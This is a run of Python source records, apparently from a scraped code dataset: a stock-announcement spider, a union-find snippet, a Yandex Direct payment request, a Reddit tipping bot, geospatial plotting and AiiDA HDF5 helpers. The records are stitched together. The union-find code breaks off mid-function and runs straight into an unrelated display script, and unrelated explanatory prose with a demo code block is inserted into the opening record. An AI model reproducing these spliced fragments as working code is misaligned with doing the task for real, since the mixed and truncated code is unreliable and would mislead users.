cat_name})\n self._spider_conn.batch_insert(items, 
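Both category_code_map and secu_id_map in the spider above are decorated with @functools.cached_property, so the dictionary (and, for secu_id_map, the SQL query behind it) is computed once per instance and then served from the instance's __dict__. A tiny stand-alone demonstration of that caching behaviour:

```python
import functools

class Catalog:
    @functools.cached_property
    def expensive_map(self):
        print("building...")              # runs only on first access
        return {code: code.upper() for code in ("a", "b")}

c = Catalog()
print(c.expensive_map["a"])   # prints "building..." then "A"
print(c.expensive_map["b"])   # served from the cache, no rebuild
```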
self.table_name, self.fields) # ['secu_id', 'category_code', 'title', 'pub_date']\n cat_num += len(items)\n\n count_map[cat_name] = cat_num\n counts += cat_num\n logger.info(f"本次股票: {stock_str}, 本次时间: {start_date}-->>{end_date}, 总数量: {counts}\\n, "\n f"分类明细: {pprint.pformat(count_map)}")\n\n def start(self, start_dt: datetime.datetime = None, end_dt: datetime.datetime = None):\n _today = datetime.datetime.combine(datetime.datetime.today(), datetime.time.min)\n\n if not start_dt:\n start_dt = _today\n if not end_dt:\n end_dt = _today\n\n self.query(start_date=start_dt, end_date=end_dt)\n self.query_unconditional(start_date=start_dt, end_date=end_dt)\n\n\nif __name__ == '__main__':\n def task():\n try:\n JuchaoHistorySpider().start()\n except:\n traceback.print_exc()\n task()\n","sub_path":"bas_secumain/base_spy.py","file_name":"base_spy.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"353968745","text":"# Spanning tree\n# Kruskal's algorithm (minimum-cost spanning tree)\n\n\n# Find the set a given element belongs to\n\ndef find_parent(parent,x):\n # If x is not the root node, recurse until the root is found\n if parent[x] != x:\n parent[x] = find_parent(parent,parent[x])\n return parent[x]\n\ndef union_parent(parent,a,b):\n a = find_parent(parent,a)\n b = find_parent(parent,b)\n\n if a < b:\n parent[b] = a\n else:\n parent[a] = b\n\n if x > L: break\r\n if level == 1:\r\n if x > 0:\r\n print(\"+++ \",end='')\r\n else:\r\n print(\"... \",end='')\r\n else:\r\n if x < level:\r\n print(\" \",end='')\r\n else:\r\n print(\"+++ \",end='')\r\n #end for\r\n print(\"\")\r\n#end display_line\r\n\r\n\r\ndef fancy_display(bordar,L):\r\n for level in range(L,0,-1):\r\n display_line(bordar,level,L)\r\n #end for\r\n#end fancy_display\r\n \r\n\r\ndef main():\r\n if len(argv) != 2:\r\n print(\"incorrect number of command line arguments\")\r\n exit(0)\r\n string = argv[1]\r\n L = len(string)\r\n if L > 12:\r\n print(\"input string too long\")\r\n return\r\n else:\r\n print(\"input string: \",end='')\r\n print(string)\r\n bordar=[0,0,0,0,0,0,0,0,0,0,0,0] # \"empty\" array of size 12\r\n L1=L\r\n for i in range(L-1):\r\n bordar[i] = maxbord(string[i:],L1)\r\n L1 = L1-1\r\n #end for\r\n simple_display(bordar,L)\r\n fancy_display(bordar,L)\r\n#end main\r\n\r\nmain()\r\n","sub_path":"fproj.py","file_name":"fproj.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"11493221","text":"import json\nimport tokens\nimport hashlib\nfrom urllib.request import urlopen\n\nurl = 'https://api-sandbox.direct.yandex.com/v4/json/'\n\noperationNum = 121\nusedMethod = 'PayCampaigns'\n\nfinanceToken = hashlib.sha256((tokens.masterToken + str(operationNum) +\n usedMethod +\n tokens.login).encode('utf8')).hexdigest()\n\ndata = {\n 'method': 'PayCampaigns',\n 'token': tokens.token,\n 'finance_token': financeToken,\n 'operation_num': operationNum,\n 'locale': 'ru',\n 'param': {\n 'Payments': [{\n 'CampaignID': (258015),\n 'Sum': (150000.0)\n }],\n \"ContractID\": ('11111/00'),\n \"PayMethod\": ('Bank')\n }\n}\n\n\n# Encode the request body as JSON\njdata = json.dumps(data, ensure_ascii=False).encode('utf8')\n\nresponse = urlopen(url, jdata)\n\n# print the result\nprint(response.read().decode('utf8'))\n","sub_path":"4_pay_campaign.py","file_name":"4_pay_campaign.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"591899257","text":"input = open('input.txt','r').readline\n\n# input \nn 
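The spanning-tree record above breaks off inside union_parent: everything between an unescaped < and the next > (the end of that snippet plus the start of the following one) appears to have been swallowed, and only the two edges of the gap are recoverable from context. For reference, a self-contained sketch of the standard Kruskal pattern those find/union helpers belong to; the edge list here is made up for illustration:

```python
def find_parent(parent, x):
    # path compression: point every visited node directly at its root
    if parent[x] != x:
        parent[x] = find_parent(parent, parent[x])
    return parent[x]

def union_parent(parent, a, b):
    a, b = find_parent(parent, a), find_parent(parent, b)
    if a < b:
        parent[b] = a
    else:
        parent[a] = b

edges = [(7, 1, 2), (3, 1, 3), (5, 2, 3), (2, 3, 4)]  # (cost, u, v), hypothetical
parent = list(range(5))   # parent[i] = i initially

total_cost = 0
for cost, a, b in sorted(edges):            # cheapest edges first
    if find_parent(parent, a) != find_parent(parent, b):   # skip cycle-forming edges
        union_parent(parent, a, b)
        total_cost += cost

print(total_cost)   # 10: the 2-, 3- and 5-cost edges form the MST
```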
= int(input())\na= list(map(int, input().split()))\n\n# DP list & initial value\ndp = [0] * (n+4)\ndp[0] = 0\n\n# DP\nfor i in range(n):\n dp[i+1] = max(dp[i], dp[i] + a[i])\n\n# Ans\nprint(dp[n])","sub_path":"121---Atcorder/DP/t1-total-/total.py","file_name":"total.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"368826286","text":"import pandas as pd\nimport geopandas as gpd\nfrom shapely.geometry import Point, Polygon\nimport matplotlib.pyplot as plt\n\nxlOrders = pd.ExcelFile(r'./resources/output/orderIn60Miles.xlsx')\nxlPolys = pd.ExcelFile(r'./resources/output/polygons.xlsx')\nxlPercents = pd.ExcelFile(r'./resources/output/polyIn60MilesPercent.xlsx')\n\n# import street map\nstreet_map = gpd.read_file('./resources/tl_2018_us_necta/tl_2018_us_necta.shp')\n# designate coordinate system\ncrs = {'init': 'EPSG:4326'}\n\nindex = 0\ndfPercents = xlPercents.parse(\"Percentage\")\nfor city in dfPercents[\"City\"]:\n print(city)\n if city == \"Boston\" or city == \"US Total\":\n continue\n dfOrders = xlOrders.parse(city)\n dfPolys = xlPolys.parse(city)\n\n dfOrdersInside = xlPercents.parse(city + \" Inside Orders\")\n dfOrdersBoundary = xlPercents.parse(city + \" Boundary Orders\")\n\n # zip x and y coordinates into single feature\n geometryOrders = [Point(x, y) for x, y in zip(dfOrders['Lng'], dfOrders['Lat'])]\n # geometryPolys = [Point(x, y) for x, y in zip(dfPolys['Lng'], dfPolys['Lat'])]\n geometryPolys = [Point(x, y) for x, y in zip(dfOrdersBoundary['Lng'], dfOrdersBoundary['Lat'])]\n\n # create GeoPandas dataframe\n geoDfOrders = gpd.GeoDataFrame(dfOrders, crs=crs, geometry=geometryOrders)\n\n geoDfPolys = gpd.GeoDataFrame(dfOrdersBoundary, crs=crs, geometry=geometryPolys)\n polygon = Polygon(geoDfPolys['geometry'].tolist())\n geoDfPolys = gpd.GeoDataFrame(geometry=[polygon], crs=crs)\n\n geoDfPolysArea = geoDfPolys.copy()\n geoDfPolysArea = geoDfPolysArea.to_crs({'init': 'epsg:32633'})\n geoDfPolysArea[\"area\"] = geoDfPolysArea['geometry'].area / 10 ** 6 # km2\n orderDensity = len(dfOrdersInside) / geoDfPolysArea[\"area\"][0]\n # print(orderDensity)\n\n # create figure and axes, assign to subplot\n fig, ax = plt.subplots(figsize=(15, 15))\n\n # add .shp mapfile to axes\n street_map.plot(ax=ax, alpha=0.4, color='grey')\n\n # add geodataframe to axes\n geoDfPolys.boundary.plot(color=None, edgecolor='k', ax=ax)\n geoDfOrders.plot(column='Distance', ax=ax, alpha=0.5, legend=True, markersize=4)\n # geoDfOrders.plot(ax=ax, alpha=0.5, legend=True, markersize=4)\n\n # add title to graph\n plt.title(city + \" (\" + dfPercents[\"Percentage\"][index] + \" inside, \" +\n \"{:.2f}\".format(orderDensity) + \" orders/km2, Total Area: \" +\n \"{:.2f}\".format(geoDfPolysArea[\"area\"][0]) + \"km2)\",\n fontsize=15, fontweight='bold')\n\n # set latitude and longitude boundaries for map display\n xMin = min(geoDfOrders['Lng'])\n xMax = max(geoDfOrders['Lng'])\n\n yMin = min(geoDfOrders['Lat'])\n yMax = max(geoDfOrders['Lat'])\n\n plt.xlim(xMin, xMax)\n plt.ylim(yMin, yMax)\n # show map\n # plt.show()\n plt.savefig(\"./resources/output/figures/\" + city + \".png\")\n index += 1\n\n","sub_path":"map-handler.py","file_name":"map-handler.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"293600404","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n#demonstrations = [\"a\", \"b\", 
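The one-dimensional DP in total.py above uses dp[i+1] = max(dp[i], dp[i] + a[i]), so each element is taken only when it helps and the answer collapses to the sum of the positive entries. A short sanity check of that equivalence on a made-up input:

```python
a = [3, -1, 4, -2, 5]
dp = 0
for x in a:
    dp = max(dp, dp + x)    # recurrence from the snippet above
assert dp == sum(x for x in a if x > 0) == 12
print(dp)
```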
\"c\"]\n#demonstrations = [\"_a\", \"_b\", \"_c\"]\ndemonstrations = [\"a\"]\n#demonstrations = [\"_a\"]\n#demonstrations = [\"a_filtered\"]\n\nfolderName = \"error_weighted\"\n#folderName = \"min_error\"\n\nwith open(\"../../src/sampling/turbulence/scale_data_turbulence_density.txt\", \"r\") as inFile:\n allLines = inFile.readlines()\n maxValueDensity = eval(allLines[0])[-1]\n minValueDensity = eval(allLines[1])[-1]\n\nfor index, item in enumerate(demonstrations):\n allPointsX = []\n allPointsY = []\n\n # scatter\n \n plt.figure()\n with open(folderName + \"/suggested_slps_\" + item + \".txt\", \"r\") as inFile:\n for line in inFile:\n point = eval(line)[0]\n\n # scale\n #point = tuple([(point[0]-minValueDensity)/(maxValueDensity-minValueDensity)])\n\n plt.scatter(point[0], point[0], c=\"b\", marker=\"o\", alpha=0.3)\n allPointsX.append(point[0])\n allPointsY.append(point[0])\n \n plt.scatter(point[0], point[0], c=\"b\", marker=\"o\", alpha=0.3, label=\"Suggested SLPs\")\n\n with open(\"demonstration_slps.txt\", \"r\") as inFile:\n point = eval(inFile.readlines()[index])\n\n # scale\n #point = tuple([(point[0]-minValueDensity)/(maxValueDensity-minValueDensity)])\n \n plt.scatter(point[0], point[0], c=\"r\", marker=\"s\", alpha=1.0, label=\"Demonstration SLPs\")\n\n plt.scatter(np.mean(allPointsX), np.mean(allPointsY), c=\"g\", marker=\"s\", alpha=1.0, label=\"Mean SLPs\")\n plt.xlabel(\"Density\")\n plt.ylabel(\"Density\")\n plt.legend()\n plt.savefig(folderName + \"/suggested_slps_\" + item)\n\n # histogram\n \n plt.figure()\n plt.hist(allPointsX, bins=50, range=(0,50))\n plt.xlabel(\"Density\")\n plt.ylabel(\"Number of Points\")\n plt.gca().set_ylim([0,100])\n plt.savefig(folderName + \"/histogram_suggested_slps_\" + item)\n","sub_path":"snippets/turbulence/plot_suggested_slps.py","file_name":"plot_suggested_slps.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"506193962","text":"import supereeg as se\nimport numpy as np\nimport glob\nimport sys\nimport os\nfrom config import config\n\n\n\nmodel_template = sys.argv[1]\n\nradius = sys.argv[2]\n\nvox_size = sys.argv[3]\n\nif model_template == 'pyFR_union':\n model_dir = os.path.join(config['datadir'], model_template +\"_\" + vox_size)\n\nelse:\n model_dir = os.path.join(config['datadir'], model_template + \"_\" + vox_size)\n\nresults_dir = os.path.join(config['resultsdir'], model_template +\"_\"+ vox_size)\n\ntry:\n if not os.path.exists(results_dir):\n os.makedirs(results_dir)\nexcept OSError as err:\n print(err)\n\nmos =glob.glob(os.path.join(model_dir, '*.mo'))\n\nmo = se.Model(mos, n_subs=len(mos))\n\nmo.save(os.path.join(results_dir, 'ave_mat'))","sub_path":"code/scripts/ave_mats/ave_mats.py","file_name":"ave_mats.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"493442547","text":"import random\nimport re\n\nfrom jinja2 import Template\nfrom praw.models import Comment, Message\n\nimport bot_logger\nimport config\nimport crypto\nimport history\nimport lang\nimport models\nimport user_function\nimport utils\n\n\ndef register_user(msg, reddit):\n rpc = crypto.get_rpc()\n\n user = models.User(msg.author.name)\n if not user.is_registered():\n user.get_new_address()\n if user.address:\n content_reply = Template(lang.message_register_success + lang.message_footer).render(\n username=user.username,\n address=user.address)\n tittle_reply = 'you 
are registered'\n\n user_function.add_user(msg.author.name, user.address)\n\n history.add_to_history(msg.author.name, \"\", \"\", \"\", \"register\")\n\n # create a backup of wallet\n crypto.backup_wallet()\n else:\n bot_logger.logger.warning('Error during register !')\n else:\n bot_logger.logger.info('%s are already registered ' % msg.author.name)\n\n balance = user.get_balance_confirmed()\n pending_balance = user.get_balance_unconfirmed()\n spendable_balance = crypto.get_user_spendable_balance(msg.author.name) + balance\n pending_value_usd = utils.get_coin_value(pending_balance)\n spendable_value_usd = utils.get_coin_value(spendable_balance)\n content_reply = Template(\n lang.message_already_registered + lang.message_account_details + lang.message_footer).render(\n username=msg.author.name,\n address=user.address,\n pending_balance=str(pending_balance),\n pending_value_usd=str(pending_value_usd),\n spendable_balance=str(spendable_balance),\n spendable_value_usd=str(spendable_value_usd)\n )\n tittle_reply = 'you are already registered'\n\n # send PM so just reply\n if type(msg) is Message:\n msg.reply(content_reply)\n\n # we have just comment so send info in PM\n if type(msg) is Comment:\n reddit.redditor(msg.author.name).message(tittle_reply, content_reply)\n\n\ndef info_user(msg):\n rpc = crypto.get_rpc()\n\n user = models.User(msg.author.name)\n if user.is_registered():\n balance = user.get_balance_confirmed()\n\n # pending_tips is balance of tip send to unregistered users\n pending_tips = user.get_balance_unregistered_tip()\n\n pending_balance = user.get_balance_unconfirmed()\n spendable_balance = crypto.get_user_spendable_balance(msg.author.name) + balance\n\n bot_logger.logger.info('user %s balance = %s' % (msg.author.name, balance))\n bot_logger.logger.info('user %s spendable_balance = %s' % (msg.author.name, spendable_balance))\n\n pending_value_usd = utils.get_coin_value(pending_balance)\n spendable_value_usd = utils.get_coin_value(spendable_balance)\n pending_tips_value_usd = utils.get_coin_value(pending_tips)\n\n msg.reply(Template(lang.message_account_details + lang.message_footer).render(\n username=msg.author.name,\n spendable_balance=str(spendable_balance),\n spendable_value_usd=str(spendable_value_usd),\n pending_balance=str(pending_balance),\n pending_value_usd=str(pending_value_usd),\n pending_tips=str(pending_tips),\n pending_tips_value_usd=str(pending_tips_value_usd),\n address=user.address))\n\n history.add_to_history(msg.author.name, \"\", \"\", spendable_balance, \"info\")\n else:\n bot_logger.logger.info('user %s not registered (command : info) ' % msg.author.name)\n msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))\n\n\ndef help_user(msg):\n user = models.User(msg.author.name)\n if user.is_registered():\n msg.reply(Template(lang.message_help + lang.message_footer).render(\n username=msg.author.name, address=user.address))\n else:\n bot_logger.logger.info('user %s not registered (command : help) ' % msg.author.name)\n msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))\n\n\ndef withdraw_user(msg, failover_time):\n split_message = msg.body.strip().split()\n\n user = models.User(msg.author.name)\n if user.is_registered():\n\n if utils.check_amount_valid(split_message[1]) and split_message[4] != user.address:\n amount = float(split_message[1])\n amount = round(amount - 0.5)\n\n user_balance = user.get_balance_confirmed()\n user_spendable_balance = 
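Nearly every reply in bot_command.py follows one jinja2 pattern: concatenate a message body with a shared footer, wrap the result in Template, and render it with keyword arguments. A stripped-down sketch of that pattern; the message strings here are placeholders, not the real lang module constants:

```python
from jinja2 import Template

# hypothetical stand-ins for the lang.message_* constants
message_tip = "{{ sender }} tipped {{ receiver }} {{ amount }} coins."
message_footer = "\n\n---\n*I am a tip bot.*"

reply = Template(message_tip + message_footer).render(
    sender="alice", receiver="bob", amount="42"
)
print(reply)
```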
crypto.get_user_spendable_balance(user.username)\n\n if amount >= float(user_balance) + float(user_spendable_balance):\n bot_logger.logger.info('user %s not have enough to withdraw this amount (%s), balance = %s' % (\n user.username, amount, user_balance))\n msg.reply(Template(lang.message_balance_low_withdraw).render(\n username=user.username, user_balance=str(user_balance), amount=str(amount)) + lang.message_footer)\n else:\n receiver_address = split_message[4]\n tip_id = random.randint(0, 99999999)\n\n history.add_to_history(user.username, user.username, receiver_address, amount, \"withdraw\", \"\", tip_id)\n\n send = crypto.tip_user(user.address, receiver_address, amount, None, failover_time)\n\n if send:\n history.update_withdraw(user.username, True, send, tip_id)\n\n value_usd = utils.get_coin_value(amount)\n msg.reply(Template(lang.message_withdraw + lang.message_footer).render(\n username=user.username, receiver_address=receiver_address, amount=str(amount),\n value_usd=str(value_usd)))\n\n elif split_message[4] == user.address:\n msg.reply(lang.message_withdraw_to_self + lang.message_footer)\n else:\n bot_logger.logger.info(lang.message_invalid_amount)\n msg.reply(lang.message_invalid_amount + lang.message_footer)\n else:\n msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))\n\n\ndef tip_user(reddit, msg, tx_queue, failover_time):\n bot_logger.logger.info('An user mention detected ')\n bot_logger.logger.debug(\"failover_time : %s \" % (str(failover_time.value)))\n\n # create an Tip\n tip = models.Tip()\n\n # update sender\n tip.set_sender(msg.author.name)\n\n # check user who use command is registered\n if tip.sender.is_registered() is not True:\n bot_logger.logger.info('user %s not registered (sender) ' % msg.author.name)\n msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))\n return False\n\n # parse message\n tip.parse_message(msg.body)\n\n # set reddit message id\n tip.message_fullname = msg.fullname\n\n # check amount of tip\n if not utils.check_amount_valid(tip.amount):\n # invalid amount\n bot_logger.logger.info(lang.message_invalid_amount)\n reddit.redditor(msg.author.name).message('invalid amount', lang.message_invalid_amount)\n return False\n\n if tip.currency is None:\n bot_logger.logger.info(lang.message_invalid_currency)\n reddit.redditor(msg.author.name).message('invalid currency', lang.message_invalid_currency)\n return False\n\n # update receiver\n tip.set_receiver(msg.parent().author.name)\n\n # check user not tip self\n if tip.sender.username == tip.receiver.username:\n reddit.redditor(tip.sender.username).message('cannot tip self',\n Template(lang.message_recipient_self).render(\n username=tip.sender.username))\n return False\n\n # check we have enough\n user_spendable_balance = crypto.balance_user(msg, failover_time)\n bot_logger.logger.debug('user_spendable_balance = %s' % user_spendable_balance)\n\n # in failover we need to use only user_balance\n if tip.amount >= float(user_spendable_balance):\n user_pending_balance = tip.sender.get_balance_unconfirmed()\n # not enough for tip\n if tip.amount < float(user_pending_balance):\n reddit.redditor(tip.sender.username).message('pending tip',\n Template(lang.message_balance_pending_tip).render(\n username=tip.sender.username))\n else:\n bot_logger.logger.info('user %s not have enough to tip this amount (%s), balance = %s' % (\n tip.sender.username, str(tip.amount), str(user_spendable_balance)))\n 
reddit.redditor(tip.sender.username).message('low balance',\n Template(lang.message_balance_low_tip).render(\n username=tip.sender.username))\n\n else:\n # add tip to history of sender & receiver\n history.add_to_history_tip(tip.sender.username, \"tip send\", tip)\n history.add_to_history_tip(tip.receiver.username, \"tip receive\", tip)\n\n # check that the receiver of the tip has an account\n if tip.receiver.is_registered():\n tip.tx_id = crypto.tip_user(tip.sender.address, tip.receiver.address, tip.amount, tx_queue,\n failover_time)\n if tip.tx_id:\n tip.finish = True\n tip.status = 'ok'\n\n bot_logger.logger.info(\n '%s tip %s to %s' % (msg.author.name, str(tip.amount), tip.receiver.username))\n\n # if the user included 'verify' in the command they will get a confirmation\n if tip.verify:\n msg.reply(Template(lang.message_tip).render(\n sender=msg.author.name, receiver=tip.receiver.username,\n amount=str(int(tip.amount)),\n value_usd=str(tip.get_value_usd()), txid=tip.tx_id\n ))\n else:\n bot_logger.logger.info('user %s not registered (receiver)' % tip.receiver.username)\n tip.status = \"waiting registration of receiver\"\n\n # save tip\n user_function.save_unregistered_tip(tip)\n\n # send message to sender of tip\n reddit.redditor(tip.sender.username).message('tipped user not registered',\n Template(lang.message_recipient_register).render(\n username=tip.receiver.username))\n # send message to receiver\n reddit.redditor(tip.receiver.username).message(\n Template(\n lang.message_recipient_need_register_title).render(amount=str(tip.amount)),\n Template(\n lang.message_recipient_need_register_message).render(\n username=tip.receiver.username, sender=msg.author.name, amount=str(tip.amount),\n value_usd=str(tip.get_value_usd())))\n\n # update tip status\n history.update_tip(tip.sender.username, tip)\n history.update_tip(tip.receiver.username, tip)\n\n\ndef history_user(msg):\n user = models.User(msg.author.name)\n if user.is_registered():\n # get user history\n data_raw = history.get_user_history(user.username)\n # keep only 30 last entry\n data = data_raw[-30:]\n\n history_table = history.build_message(data)\n\n msg.reply(Template(lang.message_history + history_table + lang.message_footer).render(username=msg.author.name))\n else:\n bot_logger.logger.info('user %s not registered (command : history) ' % msg.author.name)\n msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))\n\n\n# Resend tips to previously unregistered users that are now registered\ndef replay_remove_pending_tip(reddit, tx_queue, failover_time):\n # check whether users have pending tips\n list_tips = user_function.get_unregistered_tip()\n\n if list_tips:\n for arr_tip in list_tips:\n tip = models.Tip().create_from_array(arr_tip)\n\n bot_logger.logger.info(\"replay tipping check for %s\" % str(tip.id))\n\n # check if it's not too old & replay tipping\n if not tip.is_expired():\n if tip.receiver.is_registered():\n bot_logger.logger.info(\n \"replay tipping %s - %s send %s to %s \" % (\n str(tip.id), tip.sender.username, tip.amount, tip.receiver.username))\n\n tip.tx_id = crypto.tip_user(tip.sender.address, tip.receiver.address, tip.amount, tx_queue,\n failover_time)\n if tip.tx_id:\n tip.finish = True\n\n user_function.remove_pending_tip(tip.id)\n\n if tip.message_fullname is not None:\n msg_id = re.sub(r't\d+_(?P<id>\w+)', r'\g<id>', tip.message_fullname)\n msg = Comment(reddit, msg_id)\n msg.reply(Template(lang.message_tip).render(\n sender=tip.sender.username, receiver=tip.receiver.username, 
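replay_remove_pending_tip above turns a reddit fullname such as t1_abc123 back into a bare comment id with re.sub and a named group; the group name in that record was lost to formatting and is reconstructed here as id, which is a guess. The idiom in isolation:

```python
import re

fullname = "t1_abc123"   # made-up reddit fullname
# (?P<id>...) names the captured group; \g<id> refers back to it
msg_id = re.sub(r't\d+_(?P<id>\w+)', r'\g<id>', fullname)
print(msg_id)   # abc123
```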
amount=str(tip.amount),\n value_usd=str(tip.get_value_usd()), txid=tip.tx_id))\n\n else:\n tip.status = \"waiting registration of receiver\"\n bot_logger.logger.info(\n \"replay check for %s - user %s not registered \" % (str(tip.id), tip.receiver.username))\n\n else:\n tip.status = \"receiver not registered in time\"\n tip.finish = \"\"\n bot_logger.logger.info(\n \"delete old tipping - %s send %s to %s \" % (\n tip.sender.username, tip.amount, tip.receiver.username))\n user_function.remove_pending_tip(tip.id)\n\n # update tip status\n history.update_tip(tip.sender.username, tip)\n history.update_tip(tip.receiver.username, tip)\n else:\n bot_logger.logger.info(\"no pending tipping\")\n\n\ndef donate(reddit, msg, tx_queue, failover_time):\n user = models.User(msg.author.name)\n if user.is_registered():\n split_message = msg.body.lower().strip().split()\n\n donate_index = split_message.index('+donate')\n amount = split_message[donate_index + 1]\n if utils.check_amount_valid(amount) and split_message[donate_index + 2] == 'maga':\n\n crypto.tip_user(user.address, models.User(config.bot_name).address, amount, tx_queue,\n failover_time)\n\n history.add_to_history(msg.author.name, msg.author.name, config.bot_name, amount, \"donate\")\n else:\n bot_logger.logger.info(lang.message_invalid_amount)\n reddit.redditor(user.username).message('invalid amount', lang.message_invalid_amount)\n else:\n bot_logger.logger.info('user %s not registered (command : donate) ' % user.username)\n msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=user.username))\n\n","sub_path":"bot_command.py","file_name":"bot_command.py","file_ext":"py","file_size_in_byte":15402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"525509470","text":"import enum\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nimport pandas as pd\nimport re\n\nTool = enum.Enum(\"Tool\", \"Nabe Flypan Suihanki NotFound\")\n\ndef get_tool(text):\n if \"鍋\" in text:\n return Tool.Nabe\n if \"フライパン\" in text:\n return Tool.Flypan\n if \"炊飯器\" in text:\n return Tool.Suihanki\n return Tool.NotFound\n\ndef isUseStove(tool):\n if tool == Tool.Nabe or tool == Tool.Flypan:\n return True\n return False\n\ndef isLeavable(tool):\n if tool == Tool.Suihanki or tool == Tool.Nabe:\n return True\n return False\n\ndef get_duration(text):\n pattern = u'\\d+分'\n match = re.search(pattern, text)\n if match == None:\n return 0\n return int(text[match.start():match.end()-1])\n\ndef make_table(path):\n dirpath = path[:-4]\n df_w = pd.DataFrame(index=[], columns=['stepNo', 'text', 'useStove', 'leavable', 'duration', 'start', 'end'])\n df_r = pd.read_csv('data/'+dirpath+'.csv')\n play = -1\n step = 0\n before_text = \"\"\n for i, v in df_r.iterrows():\n if v['state']*play == 1:\n continue\n if v['state'] == 1:\n text = v['text']\n if text[:5] == before_text[:5]:\n continue\n if v['time'] <= 3.0:\n continue\n before_text = text\n tool = get_tool(text)\n series = pd.Series([step, text, isUseStove(tool), isLeavable(tool),\n get_duration(text), v['time'], 0], index=df_w.columns)\n play = 1\n continue\n if v['state'] == -1:\n series['end'] = v['time']\n play = -1\n step += 1\n df_w = df_w.append(series, ignore_index=True)\n tebledir = \"table\"\n if not os.path.isdir(tebledir):\n os.makedirs(tebledir)\n df_w.to_csv(tebledir+\"/\"+dirpath+\".csv\")\n\nif __name__ == \"__main__\":\n files = os.listdir('data/')\n for file in tqdm(files):\n 
make_table(file)\n","sub_path":"src/movie_processing/make_table.py","file_name":"make_table.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"279724848","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# © 2017-2019, ETH Zurich, Institut für Theoretische Physik\n# Author: Dominik Gresch \n\nfrom __future__ import division, print_function, unicode_literals\n\nimport h5py\nimport numpy as np\n\nfrom aiida.plugins import DataFactory\n\n\ndef write_kpoints(kpoints_data, *args, **kwargs):\n \"\"\"\n Write a 'KpointsData' instance to a file or file-like object in bands_inspect HDF5 format. Except for ``kpoints_data``, all positional\n and keyword arguments are passed to :class:`h5py.File`.\n \"\"\"\n # This can be replaced with bands_inspect.io functions when\n # AiiDA supports Python 3.\n with h5py.File(*args, **kwargs) as f:\n _serialize_kpoints(kpoints_data, f)\n\n\ndef _serialize_kpoints(kpoints_data, hdf5_handle):\n attrs = kpoints_data.attributes\n if 'mesh' in attrs:\n hdf5_handle['type_tag'] = 'kpoints_mesh'\n hdf5_handle['mesh'] = np.array(attrs['mesh'])\n hdf5_handle['offset'] = np.array(attrs['offset'])\n elif 'array|kpoints' in attrs:\n hdf5_handle['type_tag'] = 'kpoints_explicit'\n hdf5_handle['kpoints'] = np.array(kpoints_data.get_kpoints())\n else:\n raise NotImplementedError(\n \"Unrecognized KpointsData form, has attrs '{}'\".format(attrs)\n )\n\n\ndef read_bands(*args, **kwargs):\n \"\"\"\n Read a HDF5 in bands_inspect HDF5 format containing an EigenvalsData\n instance, and return an AiiDA BandsData instance. Positional and keyword\n arguments are passed to :class:`h5py.File`.\n \"\"\"\n with h5py.File(*args, **kwargs) as f:\n kpoints = _parse_kpoints(f['kpoints_obj'])\n # BandsData cannot have a mesh as k-points...\n bands = DataFactory('array.bands')()\n if 'mesh' in kpoints.attributes:\n bands.set_kpoints(kpoints.get_kpoints_mesh(print_list=True))\n else:\n bands.set_kpointsdata(kpoints)\n bands.set_bands(f['eigenvals'].value)\n return bands\n\n\ndef _parse_kpoints(hdf5_handle):\n type_tag = hdf5_handle['type_tag'].value\n kpoints = DataFactory('array.kpoints')()\n if 'kpoints_mesh' in type_tag:\n kpoints.set_kpoints_mesh(\n hdf5_handle['mesh'].value, hdf5_handle['offset'].value\n )\n elif 'kpoints_explicit' in type_tag:\n kpoints.set_kpoints(hdf5_handle['kpoints'].value)\n else:\n raise NotImplementedError(\n \"Unrecognized type_tag '{}' encountered when parsing k-points data.\"\n .format(type_tag)\n )\n return kpoints\n\n\ndef write_bands(bands_data, filename):\n \"\"\"\n Write a 'BandsData' instance to a file in bands_inspect HDF5 format.\n \"\"\"\n with h5py.File(filename, 'w') as f:\n kpt = f.create_group('kpoints_obj')\n _serialize_kpoints(bands_data, kpt)\n bands_arr = bands_data.get_bands()\n if len(bands_arr.shape) == 3:\n assert bands_arr.shape[0] == 1\n bands_arr = bands_arr[0, :, :]\n f['eigenvals'] = bands_arr\n f['type_tag'] = 'bands_inspect.eigenvals_data'\n","sub_path":"aiida_bands_inspect/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"389826950","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/meya_cli/meya_config.py\n# Compiled at: 2018-09-14 11:23:44\nfrom __future__ import 
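write_kpoints/_serialize_kpoints in the record above persist either a mesh (mesh plus offset datasets) or an explicit k-point array, discriminated by a type_tag dataset. A minimal h5py round-trip of that layout, with toy arrays instead of AiiDA objects:

```python
import h5py
import numpy as np

with h5py.File("kpoints.h5", "w") as f:
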